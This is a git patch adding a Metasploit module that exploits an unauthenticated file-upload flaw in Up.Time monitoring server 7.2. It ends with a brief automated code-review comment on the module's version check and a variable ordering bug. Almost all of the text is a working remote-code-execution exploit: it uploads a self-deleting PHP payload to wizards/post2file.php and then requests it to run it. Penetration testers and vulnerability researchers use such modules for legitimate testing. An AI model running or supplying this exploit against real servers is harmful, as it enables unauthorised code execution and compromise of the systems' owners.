From cfffd80d22866222232d217f2ef4e1b7c804a979 Mon Sep 17 00:00:00 2001
From: DoI
Date: Thu, 5 Dec 2013 11:56:05 +1300
Subject: [PATCH] Added uptime_file_upload exploit module
---
 .../exploits/linux/http/uptime_file_upload.rb | 96 +++++++++++++++++++
 1 file changed, 96 insertions(+)
 create mode 100644 modules/exploits/linux/http/uptime_file_upload.rb
diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/linux/http/uptime_file_upload.rb
new file mode 100644
index 0000000000..44306f0f26
--- /dev/null
+++ b/modules/exploits/linux/http/uptime_file_upload.rb
@@ -0,0 +1,96 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::PhpEXE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Up.Time Monitoring post2file.php Arbitrary File Upload',
+ 'Description' => %q{
+ This module exploits an arbitrary file upload vulnerability found within the Up.Time monitoring server
+ 7.2 and below. A malicious entity can upload a PHP file into the webroot without authentication, leading
+ to arbitrary code execution.
+ },
+ 'Author' =>
+ [
+ 'Denis Andzakovic ' # Vulnerability discoverey and MSF module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf']
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00"
+ },
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ [ 'Up.Time 7.2', { } ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Nov 19 2013'))
+
+ register_options([ OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),], self.class)
+ end
+
+ def check
+ uri = target_uri.path
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(uri, 'wizards', 'post2file.php')
+ })
+
+ if not res or res.code != 200
+ return Exploit::CheckCode::Unknown
+ end
+
+ return Exploit::CheckCode::Appears
+ end
+
+ def exploit
+ print_status("#{peer} - Uploading PHP to Up.Time server")
+ uri = target_uri.path
+
+ peer = "#{rhost}:#{rport}"
+ @payload_name = "#{rand_text_alpha(5)}.php"
+ php_payload = get_write_exec_payload(:unlink_self=>true)
+
+ data = Rex::MIME::Message.new
+ post_data = "file_name=#{@payload_name}&script=#{php_payload}"
+
+
+ print_status("#{peer} - Uploading payload #{@payload_name}")
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'),
+ 'data' => post_data,
+ 'headers' => {
+ 'Content-Type' => 'application/x-www-form-urlencoded'
+ }
+ })
+ if not res or res.code != 200
+ fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+ end
+
+ print_status("#{peer} - Executing payload #{@payload_name}")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(uri, 'wizards', @payload_name),
+ 'method' => 'GET'
+ })
+ end
+end
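Review bot: `check` returns `Exploit::CheckCode::Appears` for any HTTP 200 from `wizards/post2file.php`, which only shows that the path answers, not that the installed version is affected. A patched or unrelated server that replies 200 there would be reported as likely vulnerable and skew triage; `return Exploit::CheckCode::Detected` is the more accurate result unless a version or response-body test is added. In `exploit`, the first `print_status` interpolates `peer` two statements before `peer = "#{rhost}:#{rport}"` is assigned, so that first use resolves to a `peer` method if the mixins provide one and raises NameError otherwise. Either drop the local or move the assignment to the top of the method. `data = Rex::MIME::Message.new` is never read and can be deleted.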